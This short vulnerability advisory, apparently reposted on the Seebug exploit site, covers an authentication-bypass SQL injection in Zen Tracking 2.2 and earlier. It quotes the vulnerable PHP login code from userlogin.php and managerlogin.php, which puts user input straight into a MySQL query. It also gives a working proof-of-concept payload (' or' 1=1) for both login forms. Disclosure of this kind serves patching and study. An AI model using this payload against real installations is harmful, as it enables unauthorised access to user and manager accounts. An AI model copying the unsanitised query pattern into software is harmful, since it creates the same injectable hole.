[+] Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability [+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org> [+] Download : http://scripts.ringsworld.com/calendars/zentimetracking/ [+] Vuln Code : [userlogin.php] if (!empty($_POST['password'])) { $username =$_POST['username']; $password =$_POST['password']; dbConnect(); $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'". mysql_error()); [+] PoC : [ZenTracking_path]/userlogin.php username: ' or' 1=1 Password: ' or' 1=1 [+] Vuln Code : [managerlogin.php] if (!empty($_POST['password'])) { $username =$_POST['username']; $password =$_POST['password']; dbConnect(); $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'". mysql_error()); [+] PoC : [ZenTracking_path]/managerlogin.php username: ' or' 1=1 Password: ' or' 1=1
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论